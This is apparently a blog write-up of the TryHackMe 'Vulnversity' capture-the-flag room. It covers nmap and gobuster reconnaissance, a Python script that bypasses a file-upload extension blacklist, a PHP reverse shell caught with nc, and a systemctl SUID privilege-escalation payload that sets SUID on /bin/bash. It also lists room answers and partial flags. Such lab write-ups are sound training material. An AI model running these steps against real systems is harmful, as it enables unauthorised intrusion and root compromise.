TryHackMe - Vulnversity

Learn about active recon, web app attacks and privilege escalation.

Intro

I recently subscribed to TryHackMe so I could have access to their cool hackable boxes and preparation paths. Vulnversity is the first actual exploitation room on the OSCP preparation path. OSCP, or Offensive Security Certified Professional, is a ethical hacking certification that I will be aiming to get in the near future, so this room seemed like the perfect place to start.

I will be using Kali Linux to solve this box, but any system can be used provided it has all the required tools. I also had to install gobuster on my default Kali distribution, so run sudo apt install gobuster.

Make sure to check out TryHackMe!


Vulnversity Writeup

[Task 1] Deploy the machine

This task is just a setup task, so just deploy the machine and wait for it to come online. Also, connect to the provided OpenVPN configuration so you can access the deployed server (or just use the Kali box provided).

[Task 2] Reconnaissance

This task requires you to do simple recon on the box, which can be done easily using nmap, or network mapper. Scan the box using nmap -sV <IP>. nmap scan Using this information, we can solve the following questions.

Question: Scan the box, how many ports are open?

Answer: 6

Question: What version of the squid proxy is running on the machine?

Answer: 3.5.12

Question: How many ports will nmap scan if the flag -p-400 was used?

Answer: 400

(-p-400 means scan all ports up to 400)

Question: Using the nmap flag -n what will it not resolve?

Answer: DNS

(Find this by looking at the man page for nmap)

Question: What is the most likely operating system this machine is running?

Answer: Ubuntu

Question: What port is the web server running on?

Answer: 3333

[Task 3] Locating directories using GoBuster

Now that we know the web server is running on port 3333, we can view it in our browser. Navigate to IP:3333 in a web browser to see this: website

Investigating the website yields nothing of use. The next step is to use gobuster to scan the website to find any hidden directories. Make sure gobuster is installed. The wordlist I used is one that came with Kali Linux, specifically /usr/share/wordlists/dirbuster/directory-list-1.0.txt.

Run the command gobuster dir -u http://IP:3333/ -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt to scan the website. gobuster

From the scan we see an interesting url, /internal. Navigating to that url on the website brings us to: internal

/internal brings us to a page where we can upload files! Now, if we can find some way to upload a reverse shell, we can gain access on the box. My first instinct with an unrestricted file upload is to try and upload a PHP reverse shell, and indeed, this is what we need to do to compromise the web server.

Question: What is the directory that has an upload form page?

Answer: /internal/

[Task 4] Compromise the webserver

I first try to upload a PHP reverse shell. A good one is located here, but make sure to change the IP to your address in the VPN (ip addr). However, upon attempting to upload the .php file, it tells me that the extension is not allowed.

The task description gives us a hint, telling us to use Burp Suite and a list of alternative php extensions. The hope is, one of these extensions might be able to avoid the blacklist and run our reverse shell code. php extensions

I know how to use Burp Suite, so I wanted to try another way to discover any alternative extensions. Make sure your reverse shell code is placed in revshell.php. I wrote the following Python script using the requests module.

import requests

extensions = [ ".php", ".php3", ".php4", ".php5", ".phtml" ] url = "http://10.10.49.64:3333/internal/" code = "revshell.php"

for ext in extensions: name = f"revshell{ext}" files = {'file': (name, open(code))} r = requests.post(url, files=files) if "not allowed" not in r.text: print(f"Found extension: {ext}")

Running this code outputs that .phtml is a valid extension! Navigating to http://ip:3333/internal/uploads shows me that my reverse shell file was successfully uploaded. uploads

Now, I set up a listening server on my own computer using nc. I ran nc -lvp 1234, which listens on port 1234 for any incoming connections. Now, I opened the .phtml file in the uploads folder, and a reverse shell was obtained! rshell

To stabilize the shell, I ran python -c "import pty; pty.spawn('/bin/bash')", which gives me a more usable shell.

With my new shell access, I cat /etc/passwd to see that the main user on this box is named bill. I then navigate to /home/bill to read out his user flag and solve this task.

Question: Try upload a few file types to the server, what common extension seems to be blocked?

Answer: .php

Question: Run this attack, what extension is allowed?

Answer: .phtml

Question: What user was running the web server?

Answer: bill

Question: What is the user flag?

Answer: 8bd7992f...

[Task 5] Privilege Escalation

To compromise the machine, I have to find a SUID (set owner userId upon execution) binary owned by root that I can exploit. This would allow me to run commands as root, privesc-ing me to a root user who is able to read the root flag.

Running find / -perm -4000 > suid.txt gives me a list of SUID binaries on the box. Comparing this list with the list of SUID binaries on my own system, /bin/systemctl stands out to me. On my own system, /bin/systemctl doesn’t have the SUID flag, but it does on the box. This immediately feels off to me.

GTFOBins is an amazing list of exploits that can be run on Unix binaries to privesc. Searching for systemctl shows me that there is an exploit that can be run if it has the SUID flag. I now have an exploit. One easy way to get effective root privileges through running a command is to give bash the SUID flag through chmod +s /bin/bash. With this, bash -p can be run which would leave me with root privileges.

Modifying the exploit to target /bin/systemctl on the server leaves me with this:

TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/bash -c "chmod +s /bin/bash"
[Install]
WantedBy=multi-user.target' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF

Running this script and checking the permissions of bash with ls -lah /bin/bash show me that bash was successfully given the SUID flag! Now, running bash -p and then id shows me that I have the effective user id (euid) and the effective group id (egid) of root.

With root privileges, I can navigate to /root/ and read root.txt.

Question: On the system, search for all SUID files. What file stands out?

Answer: /bin/systemctl

Its challenge time! We have guided you through this far, are you able to exploit this system further to escalate your privileges and get the final answer?

Become root and get the last flag (/root/root.txt)

Answer: a58ff857...


Conclusion

All in all, a pretty simple and easy challenge.



comments powered by Disqus